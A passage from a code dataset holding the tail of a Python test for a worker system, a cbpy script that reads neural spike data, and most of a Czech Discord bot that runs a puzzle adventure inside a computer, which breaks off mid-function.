worker_connected_usecase, worker_has_work_usecase,\n work_saver, work_details_usecase,\n fixt_new_worker_dto, fixt_work, fixt_user\n ):\n db_work = await work_saver.save(fixt_work, fixt_user.user_id)\n work = fixt_work._replace(work_id=db_work.work_id)\n await worker_connected_usecase.perform(fixt_new_worker_dto)\n\n await worker_has_work_usecase.perform(fixt_new_worker_dto.worker_socket, work)\n\n work_details = await work_details_usecase.perform(\n work_id=work.work_id, user_id=fixt_user.user_id\n )\n\n last_event = work_details['events'][-1]\n assert last_event['status'] == 'PROCESSING'\n assert last_event['reason'] == 'worker_has_work'\n\n\n\n\n\n\n\n\n","repo_name":"mwalercz/yawsm","sub_path":"tests/component/usecases/test_worker_connected_and_has_work.py","file_name":"test_worker_connected_and_has_work.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36169697548","text":"'''Test script to receive and print spike/event data using cbpy'''\n\nfrom CereLink import cbpy\nimport time\n\nparameters = dict()\nparameters['inst-addr'] = '192.168.137.128'\nparameters['inst-port'] = 51001\nparameters['client-addr'] = '255.255.255.255'\nparameters['client-port'] = 51002\n\nprint('calling cbpy.open()')\nreturn_dict = cbpy.open('default', parameters)\nprint('connection:', return_dict['connection'])\nprint('instrument:', return_dict['instrument'])\n\ntry:\n print('calling cbpy.trial_config()')\n return_dict = cbpy.trial_config(True)\n # trial_config doesn't return a dict as advertised -- instead, returns a boolean (?)\n # print 'label:', return_dict['label']\n # print 'enabled:', return_dict['enabled']\n # print 'valid_unit:', return_dict['valid_unit']\n\n n_itrs = 20\n loop_time = 0.1\n\n for itr in range(n_itrs):\n t_start = time.time()\n print('\\nitr %d of %d:' % (itr+1, n_itrs))\n\n print('calling cbpy.trial_event()')\n # returns a list of tuples: (channel, digital_events) or (channel, unit0_ts, ..., unitN_ts)\n data = cbpy.trial_event(True)\n print('data:', data)\n\n t_elapsed = time.time() - t_start\n if t_elapsed < loop_time:\n time.sleep(loop_time - t_elapsed)\n print('t_elapsed: %3.3f secs, loop time: %3.3f secs' % (t_elapsed, time.time()-t_start))\n\nfinally:\n print('calling cbpy.close()')\n cbpy.close()\n","repo_name":"carmenalab/brain-python-interface","sub_path":"tests/ibmi/blackrock/cbpy_basic.py","file_name":"cbpy_basic.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"27963946870","text":"from __future__ import annotations\n\nimport discord\nimport yaml\nimport os\nimport argparse\n\nfrom datetime import datetime\nfrom typing import *\nfrom random import choice, randint, uniform\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import partial\n\n\nscript_path = os.path.dirname(os.path.abspath(__file__))\nbackup_path = os.path.join(script_path, \"backup\")\n\n\n# slovník dat pro všechny teamy\n# klíč je vždy ID kanálu daného teamu\ndata = { }\nchannels = { }\norg_channel = None\n\nstarted = False\nlast_save_time = datetime.now()\n\nasync def save():\n \"\"\"Uloží stav hry.\"\"\"\n global data, org_channel\n\n if not os.path.exists(backup_path):\n os.mkdir(backup_path)\n\n backup_name = datetime.now().strftime(\"%Y%m%d_%H%M%S\") + \".yaml\"\n\n with open(os.path.join(backup_path, backup_name), \"w\") as f:\n yaml.dump(data, f)\n\n\ndef load():\n \"\"\"Nahraje stav hry.\"\"\"\n global data\n\n # žádný backup\n if len(os.listdir(backup_path)) == 0:\n return\n\n # nejnovější backup\n backup_name = sorted(os.listdir(backup_path))[-1]\n with open(os.path.join(backup_path, backup_name), \"r\") as f:\n data = yaml.safe_load(f)\n\n\n# ---\n\nclass TicTacToe:\n\n def stripUnwanted(data):\n d = list(data)\n while len(d) != 0 and (not isinstance(d[0], int) or d[0] <= 0):\n d.pop(0)\n return d\n\n def show(data):\n \"\"\"Display the board neatly.\"\"\"\n data = TicTacToe.stripUnwanted(data)\n\n board = [\n [\" \", \" \", \" \"],\n [\" \", \" \", \" \"],\n [\" \", \" \", \" \"],\n ]\n\n for i in range(0, len(data), 2):\n i = data[i] - 1\n board[i // 3][i % 3] = \"X\"\n\n for i in range(1, len(data), 2):\n i = data[i] - 1\n board[i // 3][i % 3] = \"O\"\n\n result = f\"```\\n\"\n for i, row in enumerate(board):\n result += \"|\".join(row) + \"\\n\" + (\"\" if i == len(board) - 1 else \"-----\\n\")\n\n return result + \"```\"\n\n def won(data):\n \"\"\"0 if draw, 1 if p1 win, 2 if p2 win.\"\"\"\n data = TicTacToe.stripUnwanted(data)\n\n p1 = [data[i] - 1 for i in range(0, len(data), 2)]\n p2 = [data[i] - 1 for i in range(1, len(data), 2)]\n\n wins = ((0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6))\n\n # p1 wins\n for win in wins:\n for tile in win:\n if tile not in p1:\n break\n else:\n return 1\n\n # p2 wins\n for win in wins:\n for tile in win:\n if tile not in p2:\n break\n else:\n return 2\n\n # draw\n return 0\n\n def valid_moves(data):\n \"\"\"Valid moves for either player.\"\"\"\n data = TicTacToe.stripUnwanted(data)\n\n return [i for i in range(1, 10) if i not in data]\n\n\n# ---\n\n\nclient = discord.Client()\n\nclass Utilities:\n def get_data(id):\n global data\n return data[id]\n\n def get_location(id):\n return locations[Utilities.get_data(id)['location']]\n\n def set_location(id, location: Location):\n Utilities.get_data(id)['location'] = locations.index(location)\n\n def get_location_position(id):\n return Utilities.get_data(id)['location_position']\n\n def set_location_position(id, position):\n Utilities.get_data(id)['location_position'] = position\n\n def get_items(id):\n return Utilities.get_data(id)['items']\n\n def get_channel(id):\n global channels\n return channels[id]\n\n\nclass Action:\n \"\"\"Akce, které mohou být na konci dialogů.\"\"\"\n\n def obtainItem(item):\n \"\"\"Získání daného itemu.\"\"\"\n return partial(lambda i, id: Utilities.get_items(id).append(i.value), item)\n\n def moveToMinigame(id):\n \"\"\"Přesun do minihry dané lokace.\"\"\"\n Utilities.get_location_position(id).append(-1)\n\n\n# ---------------------------------------- CONTENT ----------------------------------------\n\nclass Item(Enum):\n \"\"\"Enum všech itemů.\"\"\"\n vysano = \"vysano\"\n rozsviceno = \"rozsviceno\"\n zrychleno = \"zrychleno\"\n pametfix = \"pametfix\"\n zdrojporazen = \"zdrojporazen\"\n pametsofware = \"pametsofware\"\n mbinstruction = \"mbinstruction\"\n\n\nclass Special(Enum):\n \"\"\"Speciální vlastnosti různých lokací.\"\"\"\n darkness = auto() # píše se ve spoilerech\n loud = auto() # musí se řvát\n please = auto() # musí se řvát\n\n\ndef no(item):\n \"\"\"Parciální funkce na to, že team item nemá.\"\"\"\n return partial(lambda x, y: x not in y, item)\n\ndef yes(item):\n \"\"\"Parciální funkce na to, že team item má.\"\"\"\n return partial(lambda x, y: x in y, item)\n\n\ndef format_remaining_time(s):\n if s >= 60 * 60 * 24 * 7:\n return f\"Zbývá ~`{s // (60 * 60 * 24 * 7)}` týdnů.\"\n\n if s >= 60 * 60 * 24:\n return f\"Zbývá ~`{s // (60 * 60 * 24)}` dnů.\"\n\n if s >= 60 * 60:\n return f\"Zbývá ~`{s // (60 * 60)}` hodin.\"\n\n if s >= 60:\n return f\"Zbývá ~`{s // (60)}` minut.\"\n\n return f\"Zbývá ~`{s}` sekund.\"\n\n\n@dataclass(frozen=True)\nclass Vysavac:\n name = \"Vysavač\"\n at = \"u vysavače\"\n to = \"k vysavači\"\n\n description = \"\"\"Přes síťovou kartu se vám povedlo bit po bitu přenést se k vysavači. Měli jste pocit, že se cestou něco zadrhlo,\n tak jste si radši třikrát zkontrolovali své kontrolní součty. A opravdu, kus vám chybí!!! Co teď budete děla... Ah, počkat,\n poslední kus se právě přenesl. Uf, vypadá to v pořádku, díky tvůrcům za to, že jste se rozhodli přenést se pomocí TCP a ne jen UDP.\n\n Když jste se pořádně rozhlédli okolo, tak jste zjistili, že jste se asi dostali do obslužné stanice těsně vedle vysavače. Ten\n vedle vás spokojeně podřimuje a nevypadá to, že by vám chtěl věnovat jakoukoliv pozornost. Prozkoumali jste obvody obslužné stanice\n a zjistili jste, že můžete provádět nějaké akce.\n \"\"\"\n\n dialogue = [\n (no(Item.vysano.value), [],\n [('zapojit', \"Zkusit `zapojit` spící vysavač do zásuvky.\", [\"Jau, co děláš, já jsem na baterky!\"],\n [('promiň', '`Promiň`, to nám nedošlo.', [], [])]\n ),\n ('popostrčit', \"Zkusit vysavač `popostrčit`.\", [\"Co do mě strkáš?\"],\n [(\"povysávat\", \"Potřebujeme u počítače trochu `povysávat`, pomůžeš?\", [\"Pokud do mě už nebudete strkat, tak ano. Potřeboval bych ale navigovat.\"],\n [('nanavigujeme', \"Jasně, `nanavigujeme`!\", [], Action.moveToMinigame),\n ('ne', \"Promiň, spíš `ne`, to zní komlikovaně.\", [], []),\n ]\n ),\n ]\n ),\n ]\n ),\n (yes(Item.vysano.value), [\"Rrrrrrrrrrrrr.\", \"Rrrr.\", \"Rrrrrrr.\"], []\n )\n ]\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Sitovka:\n name = \"Síťová karta\"\n at = \"u síťové karty\"\n to = \"k síťové kartě\"\n\n description = \"\"\"Okolo vás probíhá spousta komunikace, vypadá to tu jako na velmi rušné poště. Z velké temné chodby vybíhají velkou\n rychlostí pakety s velkým batůžkem dat na zádech, které si síťová karta prohlíží a podle čísel portů je posílá v počítači dál. Jak tak provoz\n pozorujete, tak si všimnete, že občas dorazí paket, který v ruce drží již úplně prázdné přesýpací hodiny. Před každým takovýmhle paketem\n se zjeví Paketový SMRŤ, výmluvně se na něj podívá, mávne bitovou kosou a paket se rozplyne. Otřesete se - snad existuje nějaké paketové nebe.\n\n Naopak na druhé straně si všímáte veliké antény, do které odvážně lezou jiné pakety s pilotní čepicí narvanou na hlavě. To je jen pro ty odvážné,\n ale na nějaké místa se jinak asi nedostanete.\n\n Ale každopádně, pokud chcete nějaká data, tak tady jste určitě na správném místě.\n \"\"\"\n\n _zadani_ksp = (\n 'ksp', \"Chtěli bychom si stáhnout zadání `KSP`, dáš nám nějaké?\",\n [\"Dobře, ale vyberu pro vás to nejkratší, dejte mi chvilku.... Tak jo, tady ho máte: 33-5-X1: Toto je praktická open-data úloha. V odevzdávacím systému si necháte vygenerovat vstupy a odevzdáte příslušné výstupy. Záleží jen na vás, jak výstupy vyrobíte. Výše uvedené zadání úlohy je kompletní a přesně takové, jaké má být. Žádná část mu nechybí ani nepřebývá.\"], [(\"úžasně\", \"To zní naprosto `úžasně`, do toho rozhodně jdu!\", [], [])]\n )\n\n dialogue = [\n (yes(Item.rozsviceno.value), [\"Hej, zaslechla jsem teď .\"], []),\n (yes(Item.pametfix.value), [\"Hej, zaslechla jsem teď .\"],\n [('firmware', \"Pamět je v pořádku, ale potřebujeme teď stáhnout nějaký další `firmware`, tentokrát pro LED světla k větráku?\", [\"Ok, jdeme na to.\"],\n [('ok', '`Ok`, jdeme.', [], Action.moveToMinigame)]\n ),\n _zadani_ksp,\n ]\n ),\n (yes(Item.pametsofware.value), [\"Co tu ještě děláš? Utíkej!\"], []),\n (no(Item.pametfix.value), [\"Hej, zaslechla jsem teď .\"],\n [('firmware', \"To je zajímavý. Každopádně potřebujeme stáhnout nějaký `firmware` pro paměť, pomůžeš?\", [\"Pomůžu, ale prakticky všechno v poslední době zapomíná. Doporučuji si pospíšit.\"],\n [('víme', '`Víme` o tom, pospíšíme.', [], Action.moveToMinigame)]\n ),\n _zadani_ksp,\n ]\n ),\n ]\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Motherboard:\n name = \"Motherboard\"\n at = \"u motherboardu\"\n to = \"k motherboardu\"\n\n description = \"\"\"Motherboard, matka všech komponent v počítač, tedy aspoň těch, které za to stojí (kdo by se staral o nějaké nepotřebné periferie, že ano).\n Její kořeny skrze sběrnice sahají všude, blahodárně napájí v��echny své součástky, stará se, aby si mezi sebou povídaly, a dohlíží i na to, aby nevznikaly nějaké\n problémy. Přesto si ve vzdáleném rohu desky všímáte, že tam je svět nějaký temnější a když oslovíte náhodné kolemjdoucí data putující po sběrnici, tak vás jen\n šeptem varují: \"Tam nechoď, tam je velká zlá součástka. Nikdo neví, jak se tam dostala, ale umí otrávit všechna data, co k ní dojdou. Říká se, že je to špión... ale já ti to neřekl, jo. Nikdy jsme se neviděl, jasné?\"\n\n Možná byste si s motheroardem měli promluvit. Vlastně vám není jasné, kde začít mluvit, ale máte takový pocit, že ať jste kdekoliv, tak vás uslyší.\n Přecijen byste ale mohli dojít do nějakého klidnějšího kouta a nestát uprostřed sběrnice.\n \"\"\"\n\n _q = [\"Co chceš?\", \"Všechno tu dělám sama.\", \"Ty moje děti jsou fakt spratci, ani si spolu beze mě nepovídají.\"]\n\n dialogue = [\n (yes(Item.mbinstruction.value), [\"Tak, já jsem připravená poslat do škodlivé součástky proud, napájecí cesty jsou připravené. Jestli je teda zdroj ochotný dýt proud navíc, je to docela skrblík. Pokud to s ním máte domluvené, tak se vydejte za procesorem, aby to spustil. Pamatujte, je to napájecí instrukce `XC00P147`.\"], []),\n (no(Item.vysano.value), _q,\n [('přepneš', \"V počítači je škodlivá součástka, kterou potřebujeme odpálit. `Přepneš` se prosím do režimu, abychom do ní mohli poslat více proudu?\",\n [\"Takhle špinavá rozhodně ne, podívejte na moje rozvodné obvody. Pošlu skrz ně víc proudu, zahřejí se, zapálí ten prach a všichni tady umřou. To chceš?\"],\n [('ok', '`Ok`, zkusíme s tím něco udělat.', [], [])]\n ),\n ]\n ),\n (no(Item.pametfix.value), _q,\n [('přepneš', \"S pomocí vysavače jsme všude okolo uklidili. `Přepneš` se teď?\", [\"Mohla bych, ale potřebuji instrukce, které jsou uložené někde v paměti. Zdá se ale, že paměť zapomněla, kde jsou...\"],\n [('ok', '`Ok`, zkusíme paměti pomoct.', [], [])]\n ),\n ]\n ),\n (yes(Item.pametfix.value), _q,\n [('přepneš', \"Paměti jsme aktualizovali firmware, už si vzpomněla! Přečteš instrukce a `přepneš` se?\", [\"Dobře, načítám instrukce... flashuji napájecí subprocesory... hotovo přepínám se.\"],\n [('ok', '`Ok`, moc díky!.', [], Action.obtainItem(Item.mbinstruction))]\n ),\n ]\n ),\n ]\n special = []\n\n\n@dataclass(frozen=True)\nclass Pamet:\n name = \"Paměť\"\n at = \"u paměti\"\n to = \"k paměti\"\n\n description = \"\"\"Když jste vešli do álejí paměti, tak se vám naskytl pohled na obrovskou kartotéku s miliony přihrádek po obou stranách.\n V kartotéce operovalo množství nakladačů, od malinkatých co najednou nesly jenom jednu přihrádku až po obrovská monstra, která najednou\n zvládla nabrat desítky přihrádek a poslat je po sběrnici pryč. Mezi nimi se proplétaly zase nakladače, které vybíraly jedničky a nuly ze sběrnic,\n balily je do krabic a do přihrádek ukládaly.\n\n Po chvíli pozorování jste si ale všimli zmatku. Některé nakladače zmateně jezdily sem a tam, jakoby nemohly přijít na to, do které části paměti\n některé z přihrádek uložily. Uprostřed paměťové áleje jste si všimli osamoceně sedící paměti. Dojdete k ní?\n \"\"\"\n\n dialogue = [\n (yes(Item.pametfix.value), [\"Tebe si pamatuju!\"], []),\n (no(Item.pametsofware.value), [\"Známe se? To je jedno; slyšela jsem teď super vtip. Chceš ho slyšet?\"],\n [('nechci', 'Spíš `nechci`, docela spěchám.', [], []),\n ('chci', \"Rozhodně `chci`, to zní skvěle!\", [\"Anglický nebo český?\"],\n [('anglický', 'Klidně `anglický`.', [\"The first computer bug actually involved Adam and Eve - their Apple only took one bite and it was a total disaster.\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Žádný software si nepamatuji, že by mi síťová karta odříkávala. Kdy že to bylo?\"],\n [('ok', '`ok`, zkusíme nějaký firmware stáhnout...', [], [])]\n ),\n ],\n ),\n ('český', 'Spíše `český`.', [\"Ťuk ťuk!\\nKdo tam?\\nRekurze.\\nJaká rekurze?\\nŤuk ťuk!\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Žádný software si nepamatuji, že by mi síťová karta odříkávala. Kdy že to bylo?\"],\n [('ok', '`ok`, zkusíme nějaký firmware stáhnout...', [], [])]\n ),\n ],\n ),\n ],\n ),\n ]\n ),\n # ano, je to více-méně copy-paste toho nahoře\n # ano, je to fuj\n (yes(Item.pametsofware.value), [\"Známe se? To je jedno; slyšela jsem teď super vtip. Chceš ho slyšet?\"],\n [('nechci', 'Spíš `nechci`, docela spěchám.', [], []),\n ('chci', \"Rozhodně `chci`, to zní skvěle!\", [\"Anglický nebo český?\"],\n [('anglický', 'Klidně `anglický`.', [\"The first computer bug actually involved Adam and Eve - their Apple only took one bite and it was a total disaster.\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Na něco si vzpomínám! Jdu na to.\"],\n [('ok', '`ok`, to se povedlo.', [], Action.obtainItem(Item.pametfix))]\n ),\n ],\n ),\n ('český', 'Spíše `český`.', [\"Ťuk ťuk!\\nKdo tam?\\nRekurze.\\nJaká rekurze?\\nŤuk ťuk!\"],\n [('aktualizuješ', 'To je skvělé. `Aktualizuješ` se prosím? Nový firmware by mohl pomoci tvému zapomínání', [\"Na něco si vzpomínám! Jdu na to.\"],\n [('ok', '`ok`, to se povedlo.', [], Action.obtainItem(Item.pametfix))]\n ),\n ],\n ),\n ],\n ),\n ]\n ),\n ]\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Zdroj:\n name = \"Zdroj\"\n at = \"u zdroje\"\n to = \"ke zdroji\"\n\n description = \"\"\"Cestou ke zdroji jste se málem nechali seškvařit probíhajícím útvarem elektronů, jejich velitel křičel něco jako: \"Póóóhyb, póóóhyb, myslíte si, že grafická karta se bez nás obejde? I vaše elektronová babička běhala rychlejc. Póóóhyb.\"\n Vyhnuli jste se jim úskokem do nevyužité napájecí větve, pak jste se oklepali a už opatrně u stěny jste došli až do zdroje.\n\n Tady to celé hučí, funí, bzučí a ve vzduchu cítíte všechen ten výkon. Z vrchu přichází od větráku neustálý proud vzduchu, ale i s ním je tu docela teplo.\n Ani si nechcete představit, co by se stalo, kdyby najednou přestal foukat.\n \"\"\"\n\n # Slepá cesta navíc nikdy neuškodí ;)\n _vypnes_se = ('vypneš', \"`Vypneš` se prosím?\", [\"Dobř... tak počkat, máte k tomuhle pověření? Jste od tlačítka? Nebo jdete s příkazem od procesoru? Chci vidět vaše pověření a to hned! Nemáte? Tak to nic nebude.\"], [(\"pardón\", \"`Pardón`, to jsme nevěděli.\", [], [])])\n _nic = ('nic', \"Vlastně `nic`, promiň že rušíme.\", [], [])\n\n dialogue = [\n (no(Item.zrychleno.value), [\"Na co čumíš?\", \"Ano, 350W, čteš to správně.\"],\n [('navýšit', \"Můžeš prosím `navýšit` proud do procesoru?\", [\"Ani náhodou, je tu hrozný horko.\"],\n [('ok', '`Ok`, zkusíme s tím něco udělat.', [], [])]\n ),\n _vypnes_se,\n _nic,\n ]\n ),\n (no(Item.zdrojporazen.value), [\"Na co čumíte?\", \"Ano, 350W, čtete správně.\"],\n [('navýšit', \"Můžeš prosím `navýšit` proud do procesoru?\", [\"Mohl bych, ale musíš mi dokázat, že na to máte.\"],\n [('co', 'Na `co` máme?', [\"Přece na to. Poražte mě v piškvorkách a proud je váš.\"],\n [('porazím', \"`Porazím` tě hravě, sleduj.\", [], Action.moveToMinigame),\n ('ne', \"To spíš `ne`, piškvorky hrát neumíme.\", [], []),\n ],\n )\n ]\n ),\n _vypnes_se,\n _nic,\n ]\n ),\n (yes(Item.zdrojporazen.value), [\"Respekt.\", \"Pěkná práce.\"], [])\n ]\n\n\n special = []\n\n\n@dataclass(frozen=True)\nclass Vetraky:\n name = \"Větrák\"\n at = \"u větráku\"\n to = \"k větráku\"\n\n description = \"\"\"Šplháte větrací šachtou od zdroje k větráku a cítíte narůstající průvan. Za chvíli je tu takový hluk, že si myslíte, že už větší být nemůže. Ale pak vylezete za další záhyb a ještě se zesílá.\n Tady mluvení nedává smysl, budete muset řvát. A to ještě jenom po větru, jinak vás stejně nikdo neuslyší. Navíc za záhybem už také přestalo prosvítat světlo ze zdroje a vám asi nezbude nic jiného, než\n si na všechno kolem svítit.\n \"\"\"\n\n dialogue = [\n (yes(Item.zrychleno.value), [\"rychlejc to neumím!\"], []),\n (no(Item.rozsviceno.value), [\"co se děje? kdo tam?\"],\n [('zrychlit', \"potřebujeme více chlazení pro zdroj, můžeš se prosím `zrychlit`?\", [\"je tu tma jako v pytli, potřebuju lepší firmware osvětlení!\"],\n [('dobře', '`dobře`, nějaké ti zkusíme sehnat.', [], [])]\n ),\n ]\n ),\n (yes(Item.rozsviceno.value), [\"to mi tu to hezky svítí.\"],\n [('zrychlit', \"můžeš se tedy prosím `zrychlit` teď?\", [\"ok, zkusím to.\"],\n [('dobře', '`dobře`, díky!', [], Action.obtainItem(Item.zrychleno))]\n ),\n ]\n ),\n ]\n\n special = [Special.loud, Special.darkness]\n\n\n@dataclass(frozen=True)\nclass Procesor:\n name = \"Procesor\"\n at = \"u procesoru\"\n to = \"k procesoru\"\n\n description = \"\"\"Stoupáte po schodech z motherboardu až na bájný vrcholek patice, kde sídlí vševědoucí procesor. Cestou minete řady kondenzátorů stojících\n na stráži okolo procesoru a pak překročíte hranu patice a vejdete do paláce procesoru.\n\n Na hlavě má obrovskou hliníkovou korunu, na jejímž vrcholku má ještě svůj vlastní osobní větrák a vítr z něj mu čechrá jeho stříbrné vlasy. Stojí na tisících\n zlatých nožek a když se na procesor podíváte, tak zahlédnete několik hlav, kde každá dělá něco úplně jiného. Ještě nikdy jste nezahlédli někoho tak\n efektivního. Do paláce proudí zástupy žadatelů, kteří chtějí chvilku jeho času, a procesor se ochotně každému aspoň chviličku věnuje. Někdy si sice musí\n žadatel chviličku počkat, ale pak je přijat se vší parádou.\n\n I na vás snad za chviličku přijde řada a jedna z hlav procesoru se vás laskavě ujme.\n \"\"\"\n\n dialogue = [\n (lambda _: True, [\"Přišli jste k části procesoru a zaklepali na firewall. Chvilku na něj prosím počkejte.\"], []),\n ]\n\n special = []\n\n\n# není úplně hezké, ale co naděláš...\nlocations = [Vysavac(), Sitovka(), Motherboard(), Pamet(), Zdroj(), Vetraky(), Procesor()]\nvysavac, sitovka, motherboard, pamet, zdroj, vetraky, procesor = locations\n\npaths = {\n vysavac: [sitovka],\n sitovka: [vysavac, motherboard],\n motherboard: [pamet, procesor, zdroj, sitovka],\n pamet: [motherboard],\n zdroj: [motherboard, vetraky],\n vetraky: [zdroj],\n procesor: [motherboard],\n}\n\nend_game_text = \"\"\"\n Přesvědčili jste procesor, aby vyslal po sběrnici instrukci `XC00P147`. Na sběrnici, na které poslouchaly\n naflashované napájecí čipy základní desky. Trvalo to jen zlomek sekundy, během které si napájecí čipy\n u zdroje ověřily, že jim umí dodat dostatek proudu, a pak již otevřely cestu proudu do osamocené napájecí\n větve vedoucí do rohu desky. Zároveň vypnuly na této lince všechny proudové ochrany.\n\n Napětí se skokově zvedlo a zlý invazní čip, který nějaký útočník přidal na okraj základní desky aby odposlouchával\n a škodil, se začal potit. Ale ještě to zvládal. Napájecí větev se začala postupně zahřívat (ještě, že jste z ní odstranili\n prach!) a větrák u zdroje se roztočil na nejvyšší výkon, ale zdroj tu zátěž zvládl.\n\n \"Ještě pár sekund, už to bude,\" říkala si základní deska, která začínala cítit, že se napájecí větev rozžhavuje stále\n více a více. A najednou prásk! Ze zlého čipu v rohu základní desky najednou unikl všechen magický kouř a plastový obal\n z toho nejčernějšího plastu bez potisku se roztekl. Zbytek počítače však žil a všechny komponenty cítily, jak v tu chvíli\n zmizela přítomnost čehosi zlého, co je tu poslední dobou strašilo.\n\n \"Děkuji vám,\" prohlásil procesor a vy jste najednou cítili, jak vás vesmírná síla volá kamsi dál. Uklonili jste\n se procesoru a pomalu jste se vznesli z vodičů do vzduchu a pak kamsi do dáli. Další počítače čekaly na svojí\n záchranu a vy jste si v tuto chvíli uvědomili, že to je přesně vaše poslání.\n\n Pokračování příště…\n\"\"\"\n\n# ---------------------------------------- CONTENT ----------------------------------------\n\nasync def update(id, response) -> bool:\n \"\"\"Upraví stav pro daný team podle toho, jak zareagovali. Vrátí true/false podle toho,\n zda se update povedl a má se volat write.\"\"\"\n global org_channel\n\n location = Utilities.get_location(id)\n position = Utilities.get_location_position(id)\n items = list(Utilities.get_items(id))\n\n sanitized_response = response.strip().lower()\n\n if position != None:\n position = list(position)\n\n # jsme-li v minihře\n if len(position) != 0 and isinstance(position[-1], int):\n if location == vysavac:\n pos = (4, 1)\n solution = [\n \"#########\",\n \"#### ####\",\n \"#### #\",\n \"# ### #\",\n \"# # #\",\n \"# #######\",\n \"# #######\",\n \"#########\",\n ]\n\n mapping = {\n \"l\": (\"doleva\", (-1, 0)),\n \"r\": (\"doprava\", (1, 0)),\n \"u\": (\"nahoru\", (0, -1)),\n \"d\": (\"dolů\", (0, 1)),\n }\n\n if sanitized_response.replace(\"l\", \"\").replace(\"u\", \"\").replace(\"r\", \"\").replace(\"d\", \"\") != \"\":\n await send_with_special(id, f\"**{location.name}:** V instrukcích jsou špatné znaky!\", location.special)\n return False\n\n for char in sanitized_response:\n pos = (pos[0] + mapping[char][1][0], pos[1] + mapping[char][1][1])\n\n if solution[pos[1]][pos[0]] == \"#\":\n await send_with_special(id, f\"**{location.name}:** Při jízdě {mapping[char][0]} jsem narazil do zdi. Vracím se zpět.\", location.special)\n return False\n\n if pos == (1, 6):\n await send_with_special(id, f\"**{location.name}:** Úspěšně jsem k počítači dojel! Vysávám...\", location.special)\n Utilities.set_location_position(id, [])\n Utilities.get_items(id).append(Item.vysano.value)\n return True\n\n await send_with_special(id, f\"**{location.name}:** Do ničeho jsem nenarazil, ale k počítači jsem se nedostal. Vracím se zpět.\", location.special)\n return False\n\n if location == zdroj:\n try:\n pos = int(sanitized_response)\n\n if not (1 <= pos <= 9):\n await send_with_special(id, f\"**{location.name}:** Neumíš počítat? `{pos}` není platný.\", location.special)\n return False\n\n data = Utilities.get_location_position(id)\n valid_moves = TicTacToe.valid_moves(data)\n\n if pos not in valid_moves:\n await send_with_special(id, f\"**{location.name}:** No tak tam asi, ne, tam už něco je.\", location.special)\n return False\n\n data.append(pos)\n\n if TicTacToe.won(data) == 2:\n await send_with_special(id, f\"**{location.name}:** Pff, slušný výkon, proud máte navýšený.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n Utilities.get_items(id).append(Item.zdrojporazen.value)\n return True\n\n valid_moves = TicTacToe.valid_moves(data)\n data.append(choice(valid_moves))\n\n if TicTacToe.won(data) == 1:\n await send_with_special(id, f\"**{location.name}:** Ha, vyhrál jsem! Zkus to třeba příště.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n return True\n\n if TicTacToe.won(data) == 0 and len(TicTacToe.valid_moves(data)) == 0:\n await send_with_special(id, f\"**{location.name}:** Remíza, takže smůla! Zkus to někdy jindy.\" + \"\\n\" + TicTacToe.show(data), location.special)\n Utilities.set_location_position(id, [])\n return True\n\n msg = choice([f\"**{location.name}:** Zajímavý tah.\", f\"**{location.name}:** Hmm...\", f\"**{location.name}:** Slabý tah.\"]) + \"\\n\" + TicTacToe.show(data)\n\n await send_with_special(id, msg, location.special)\n return False\n\n\n except ValueError:\n await send_with_special(id, f\"**{location.name}:** Co to meleš, `{sanitized_response}` není číslo.\", location.special)\n return False\n\n if location == sitovka:\n knp = [\"kámen\", \"nůžky\", \"papír\"]\n if sanitized_response not in knp:\n await send_with_special(id, f\"**{location.name}:** Hrajeme `kámen`, `nůžky` nebo `papír`!\", location.special)\n return False\n\n faejio = choice(knp)\n\n if sanitized_response == faejio:\n await send_with_special(id, f\"**{location.name}:** Také jsem měl `{faejio}`, remíza.\", location.special)\n return False\n\n if knp.index(sanitized_response) == (knp.index(faejio) - 1) % len(knp):\n msg = f\"Měl jsem `{faejio}`, vyhrál jsi!\"\n Utilities.get_location_position(id)[-1] = int(Utilities.get_location_position(id)[-1] / uniform(5, 10))\n else:\n msg = f\"Měl jsem `{faejio}`, prohrál jsi!\"\n Utilities.get_location_position(id)[-1] = int(Utilities.get_location_position(id)[-1] / uniform(2, 3))\n\n if Utilities.get_location_position(id)[-1] < 10:\n msg += \" Staženo!\"\n await send_with_special(id, f\"**{location.name}:** {msg}\", location.special)\n Utilities.set_location_position(id, [])\n if Item.pametfix.value not in Utilities.get_items(id):\n Utilities.get_items(id).append(Item.pametsofware.value)\n else:\n Utilities.get_items(id).append(Item.rozsviceno.value)\n return True\n\n await send_with_special(id, f\"**{location.name}:** {msg} {format_remaining_time(Utilities.get_location_position(id)[-1])}\", location.special)\n return False\n\n # stojíme u lokace\n if position is None:\n # můžeme dojít ke komponentě\n if sanitized_response == \"dojít\":\n Utilities.set_location_position(id, [])\n\n if location == procesor:\n await org_channel.send(f\"Team {Utilities.get_data(id)['name']} došel k procesoru.\")\n\n return True\n\n # můžeme jít do dostupných lokací\n try:\n int_response = int(sanitized_response)\n\n if int_response <= 0 or int_response > len(paths[location]):\n await send_with_special(id, \"Neplatné číslo lokace.\", location.special)\n return False\n\n Utilities.set_location(id, paths[location][int_response - 1])\n return True\n\n except ValueError:\n await send_with_special(id, \"Neplatná možnost.\", location.special)\n return False\n\n # jsme u komponenty - vždy můžeme jít zpět\n if position == []:\n if sanitized_response == \"zpět\":\n if location == procesor:\n await org_channel.send(f\"Team {Utilities.get_data(id)['name']} odešel od procesoru.\")\n\n Utilities.set_location_position(id, None)\n return True\n\n # najít správnou větev\n for condition, _, other in location.dialogue:\n if condition(items):\n break\n\n # 